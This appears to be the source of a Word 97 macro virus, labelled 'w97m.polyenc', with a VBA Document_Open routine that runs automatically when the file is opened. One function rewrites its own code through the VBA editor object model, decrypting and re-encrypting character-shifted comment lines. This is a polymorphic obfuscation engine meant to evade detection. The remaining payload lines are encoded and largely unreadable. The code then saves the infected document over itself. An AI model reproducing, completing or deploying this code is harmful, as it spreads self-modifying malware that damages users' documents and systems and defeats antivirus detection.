'c0d3 d3 pr0t0z00
'w97m.polyenc

Private Sub Document_Open()
Application.EnableCancelKey = wdCancelInterrupt
If Application.Windows.Count > 1 Then ActiveDocument.Close
Call SmeXeH_5 '
Call SkdBb9_5
End Sub
Private Sub SkdBb9_5()
'IS\ʆؖ@z@Ȇؒ
'IS@hpj
'IS@ʰʐj
'IS\ܪ@z@
'IS\@z@
'IS\@z@Ȃ
'ISȄ\ʂޚ@`
'IS@P\R@x|@DD@
'IS@fj@z@ʈ\\PbR\ʚ
'IS@`j@z@ب\\PbR\ʚ
'IS@P`j\PhX@bRX@bR@z@DND@@ި@ll־j
'ISި@df־jt
'IS@
'ISll־jt
'IS@fj@z@ب\\PbR\ʚ
'IS@`j@z@ʈ\\PbR\ʚ
'IS@P`j\PhX@bRX@bR@z@DND@@ި@nΘj
'ISdf־jt
'ISj@z@fj\PbX@fj\̘R
'IS`j\ʘ@bX@`j\̘
'IS`j\@bX@j
'ISnΘjt
'ISpl@z@Drn\jjf@P`f@f@ffLfj`R\D
'IS@Dtކ\D@@@@Fb
'IS@FbX@Djjf\D
'IS@Fb
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
End Sub
Private Function SxX4a8_5()
'IS\ʆؖ@z@Ȇؒ
'IS@d־j@z@b@@\\ʠ\
'IS@P\\ʠPd־jR\ʚ\PhX@bRX@bR@z@DND@@ި@얾j
'IS@d־j
'IS얾jt
'IS@z@DD
'ISt@djԾj@z@PPPr`@Z@lj@V@bR@T@@V@ljRR
'ISt@frj@z@PPr@T@R@V@`R
'IS@jj־j@z@\
'IS@bj@z@d@@jj־j\ʠPd־jR\ʚ\̘
'IShpj@z@Pjj־j\ʠPd־jR\ʚ\PbjX@bRR
'IS@pj@z@b@@hpj
'IS`¾j@z@Pjj־j\ʠPd־jR\ʚ\PbjX@bRX@pjX@pR
'IS@P`¾jX@nX@bR@z@@
'IShpj@z@P`¾jR@Z@f
'IS@rΤj@z@b@@hpj
'IS@ښjjPpR
'IS`lj@z@P`¾jX@rΤj@V@bX@bR
'ISښjjPrΤjR@z@`lj
'IS@rΤj
'IS`¾j@z@djԾj@L@ښjjPjR@L@ښjjPbR@L@ښjjPdR@L@ښjjPfR@L@ښjjPhR@L@@L@frj
'IS@fj@z@b@@hpj
'IS@P`¾jX@pR@z@Pjj־j\ʠPd־jR\ʚ\PbjX@bRX@fjX@pR@
'ISjjj@z@Pjj־j\ʠPd־jR\ʚ\PbjX@bRX@pj@Z@bR
'ISfrj@z@Pjj־j\ʠPd־jR\ʚ\PbjX@bRX@PjjjR@V@rX@hpjR
'ISrj@z@jjj@V@`¾j@V@frj
'ISjj־j\ʠPd־jR\ʚ\ʘ@bjX@b
'ISjj־j\ʠPd־jR\ʚ\@bjX@rj
'IS@
'IS@fj
'IS@
'IS@pj
'IS@bj
End Function
Private Function SmeXeH_5()
Application.EnableCancelKey = wdCancelInterrupt
'If Application.ShowVisualBasicEditor = True Then Exit Function
For SuO3dB_5 = 1 To 2
For SvaCm8_5 = 1 To Application.VBE.CodePanes.Count
If Right(Application.VBE.CodePanes(SvaCm8_5).CodeModule.lines(4, 1), 1) = "'" Then
S37LtD_5 = Application.VBE.CodePanes(SvaCm8_5).CodeModule.CountOfLines
If SuO3dB_5 = 1 Then SooTk2_5 = 8: SV19gv_5 = 69
If SuO3dB_5 = 2 Then SooTk2_5 = S37LtD_5 - 65: SV19gv_5 = 33
Set S2XQnZ_5 = Application.VBE.CodePanes(SvaCm8_5).CodeModule
For SshHh8_5 = SooTk2_5 To S2XQnZ_5.CountOfLines - SV19gv_5
SkrRr8_5 = S2XQnZ_5.lines(SshHh8_5, 1)
For SciIiL_5 = 1 To Len(SkrRr8_5)
If Left(S2XQnZ_5.lines(SshHh8_5, 1), 1) = "'" Then
SRhA5c_5 = Chr(Asc(Mid(SkrRr8_5, SciIiL_5, 1)) / 2): GoTo SKC2h2_5
End If
SRhA5c_5 = Chr(Asc(Mid(SkrRr8_5, SciIiL_5, 1)) * 2)
SKC2h2_5: SAiL3e_5 = SAiL3e_5 + SRhA5c_5
Next SciIiL_5
S2XQnZ_5.DeleteLines SshHh8_5, 1
If Mid(SAiL3e_5, 2, 1) = "$" Then
S2XQnZ_5.InsertLines SshHh8_5, Mid(SAiL3e_5, 4, Len(SAiL3e_5))
GoTo SKC3h3_5
End If
S5tLxd_5 = Mid(S2XQnZ_5.lines(7, 1), 13, 1)
S2XQnZ_5.InsertLines SshHh8_5, "'I" + S5tLxd_5 + SAiL3e_5
SKC3h3_5: SAiL3e_5 = ""
Next SshHh8_5
End If
Next SvaCm8_5
Next SuO3dB_5
End Function